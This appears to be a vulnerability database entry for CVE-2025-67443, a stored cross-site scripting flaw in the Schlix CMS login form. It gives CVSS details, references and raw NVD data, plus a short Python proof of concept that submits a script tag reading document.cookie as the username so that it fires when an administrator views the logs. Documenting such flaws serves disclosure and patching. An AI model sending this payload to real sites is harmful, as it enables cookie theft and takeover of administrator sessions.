CVE-2025-67443

Description

Schlix CMS before v2.2.9-5 is vulnerable to Cross Site Scripting (XSS). Due to lack of javascript sanitization in the login form, incorrect login attempts in logs are triggered as XSS in the admin panel.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:schlix:cms:*:*:*:*:*:*:*:* - VULNERABLE

Schlix CMS < v2.2.9-5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-67443 XSS PoC for Schlix CMS
# Target: Schlix CMS login form
# Vulnerability: Stored XSS via login form

target_url = "http://target-site.com/schlix-admin/"

# Malicious payload - XSS via login form
xss_payload = '<script>alert(document.cookie)</script>'

# Login attempt with XSS payload
login_data = {
    'username': xss_payload,
    'password': 'anypassword',
    'submit': 'Login'
}

try:
    response = requests.post(target_url, data=login_data, timeout=10)
    print(f"[*] XSS payload sent: {xss_payload}")
    print(f"[*] Response status: {response.status_code}")
    print("[*] PoC sent successfully. When admin views logs, XSS will execute.")
except requests.RequestException as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67443
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67443
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67443/
[4] VulDB https://vuldb.com/cve/CVE-2025-67443
[5] https://gist.github.com/akinerkisa/b22f4517a4011d049c5fc7fd3b29c9f2
[6] https://www.schlix.com/news/release/december-2025-errata-5-bug-fix-release.html#:~:text=Fixed%20XSS%20vulnerability%20bug%20when%20clicking%20New%20User%20%28thank%20you%20to%20Ak%C4%B1ner%20K%C4%B1sa%20who%20reported%20this%20security%20bug%20and%20provided%20reasonable%20time%20to%20fix%29

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67443", "sourceIdentifier": "[email protected]", "published": "2025-12-22T17:15:59.913", "lastModified": "2026-01-02T16:56:19.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Schlix CMS before v2.2.9-5 is vulnerable to Cross Site Scripting (XSS). Due to lack of javascript sanitization in the login form, incorrect login attempts in logs are triggered as XSS in the admin panel."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:schlix:cms:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.9-5", "matchCriteriaId": "90243240-BE93-4144-ACBE-E4D5AB2B5396"}]}]}], "references": [{"url": "https://gist.github.com/akinerkisa/b22f4517a4011d049c5fc7fd3b29c9f2", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.schlix.com/news/release/december-2025-errata-5-bug-fix-release.html#:~:text=Fixed%20XSS%20vulnerability%20bug%20when%20clicking%20New%20User%20%28thank%20you%20to%20Ak%C4%B1ner%20K%C4%B1sa%20who%20reported%20this%20security%20bug%20and%20provided%20reasonable%20time%20to%20fix%29", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}